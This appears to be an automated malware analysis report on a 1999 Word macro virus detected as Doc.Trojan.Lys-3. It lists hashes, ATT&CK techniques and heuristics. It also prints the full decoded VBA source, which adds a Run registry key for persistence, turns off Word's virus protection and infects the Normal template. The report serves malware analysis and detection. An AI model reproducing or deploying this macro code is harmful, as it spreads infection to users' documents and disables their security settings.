Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2b5a277d0448f281…

MALICIOUS

Office (OLE)

35.5 KB Created: 1999-05-21 21:10:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 38341d421c7865c0244f6a725d147294 SHA-1: bb3db6c73f0be1a608f6bc090c58c1d72bd1f1ae SHA-256: 2b5a277d0448f281a286ce09596d86ad875ebffef0f43b65e8ec4241a0bc40d5
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes upon document close. This macro writes a registry key to establish persistence for 'Jamie.vbs' and exports a DLL and VBScript to the system directory. The script also attempts to create a file named 'Jamie.sys' which contains VBA code to add the exported DLL. The ClamAV detection 'Doc.Trojan.Lys-3' and the date of creation (1999) suggest this is an older, but functional, persistence mechanism.

Heuristics 5

  • ClamAV: Doc.Trojan.Lys-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lys-3
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Open "C:\WINDOWS\SYSTEM\Jamie.vbs" For Output As #1
    Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
    Print #1, "Jamie.Options.VirusProtection = False"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Open "C:\WINDOWS\SYSTEM\Jamie.sys" For Output As #1
    Print #1, "Private Sub Document_Open()"
    Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Jamie.dll" & Chr(34) & ")"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1625 bytes
SHA-256: ecaec38390c32c90fad46a3b0a8c706b71fedf6706972d0acd18ec1354a1bc27
Detection
ClamAV: Doc.Trojan.Lys-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Jamie") = "C:\WINDOWS\SYSTEM\Jamie.vbs"
ActiveDocument.VBProject.VBComponents.Item(1).Export ("C:\WINDOWS\SYSTEM\Jamie.dll")
Open "C:\WINDOWS\SYSTEM\Jamie.vbs" For Output As #1
Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "Jamie.Options.VirusProtection = False"
Print #1, "Jamie.Options.SaveNormalPrompt = False"
Print #1, "Jamie.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Jamie.sys" & Chr(34) & ")"
Print #1, "Jamie.Application.Quit"
Close #1
Open "C:\WINDOWS\SYSTEM\Jamie.sys" For Output As #1
Print #1, "Private Sub Document_Open()"
Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Jamie.dll" & Chr(34) & ")"
Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule"
Print #1, "For x = x To 3"
Print #1, ".DeleteLines 1"
Print #1, "Next"
Print #1, "End With"
Print #1, "End Sub"
Close #1
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
',.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,
' Jamie(Type B - Strand B) By Lys KovicK
' Released: Friday, May 21, 1999, 16:10
'';';';';';';';';';';';';';';';';';';';';'